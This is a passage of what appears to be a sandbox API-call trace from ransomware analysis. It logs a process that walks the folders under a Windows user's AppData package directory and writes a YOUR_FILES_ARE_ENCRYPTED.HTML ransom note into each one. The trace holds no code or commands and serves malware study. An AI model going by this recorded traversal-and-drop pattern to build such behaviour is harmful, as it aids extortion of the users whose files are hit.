nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0118.142] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.142] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies") returned 101 [0118.142] GetProcessHeap () returned 0x600000 [0118.142] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.142] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies" [0118.142] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0118.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbcc3f61, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbcc3f61, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbcc3f61, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0118.142] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbcc3f61, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbcc3f61, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbcc3f61, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName="..", cAlternateFileName="")) returned 1 [0118.142] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbcc3f61, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbcc3f61, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbcc3f61, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName="..", cAlternateFileName="")) returned 0 [0118.142] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0118.142] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0118.142] GetProcessHeap () returned 0x600000 [0118.142] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.143] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.144] CloseHandle (hObject=0x320) returned 1 [0118.144] GetProcessHeap () returned 0x600000 [0118.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.144] GetProcessHeap () returned 0x600000 [0118.144] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.144] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0118.145] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.145] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory") returned 101 [0118.145] GetProcessHeap () returned 0x600000 [0118.145] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.145] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory" [0118.145] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0118.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName=".", cAlternateFileName="")) returned 0x626838 [0118.145] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName="..", cAlternateFileName="")) returned 1 [0118.145] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName="..", cAlternateFileName="")) returned 0 [0118.145] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0118.145] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0118.145] GetProcessHeap () returned 0x600000 [0118.145] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.146] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.147] CloseHandle (hObject=0x320) returned 1 [0118.147] GetProcessHeap () returned 0x600000 [0118.147] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.147] GetProcessHeap () returned 0x600000 [0118.147] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.147] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="Temp", cAlternateFileName="")) returned 1 [0118.147] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.148] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp") returned 94 [0118.148] GetProcessHeap () returned 0x600000 [0118.148] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.148] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp" [0118.148] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp\\*" [0118.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.148] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName="..", cAlternateFileName="")) returned 1 [0118.148] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName="..", cAlternateFileName="")) returned 0 [0118.148] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.148] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0118.148] GetProcessHeap () returned 0x600000 [0118.148] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.149] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.150] CloseHandle (hObject=0x320) returned 1 [0118.150] GetProcessHeap () returned 0x600000 [0118.150] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.151] GetProcessHeap () returned 0x600000 [0118.151] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.151] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="Temp", cAlternateFileName="")) returned 0 [0118.151] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.151] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0118.151] GetProcessHeap () returned 0x600000 [0118.151] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.151] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.152] CloseHandle (hObject=0x324) returned 1 [0118.153] GetProcessHeap () returned 0x600000 [0118.153] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.153] GetProcessHeap () returned 0x600000 [0118.153] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.154] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0118.154] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.154] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData") returned 94 [0118.154] GetProcessHeap () returned 0x600000 [0118.154] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.155] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData" [0118.155] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData\\*" [0118.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.163] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 1 [0118.163] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc77a0e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc77a0e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc77a0e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 0 [0118.163] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.163] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0118.163] GetProcessHeap () returned 0x600000 [0118.163] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.165] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.166] CloseHandle (hObject=0x324) returned 1 [0118.166] GetProcessHeap () returned 0x600000 [0118.166] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.166] GetProcessHeap () returned 0x600000 [0118.166] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.166] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc51817, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc51817, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0118.166] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.167] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache") returned 97 [0118.167] GetProcessHeap () returned 0x600000 [0118.167] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.167] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache" [0118.167] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache\\*" [0118.167] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: 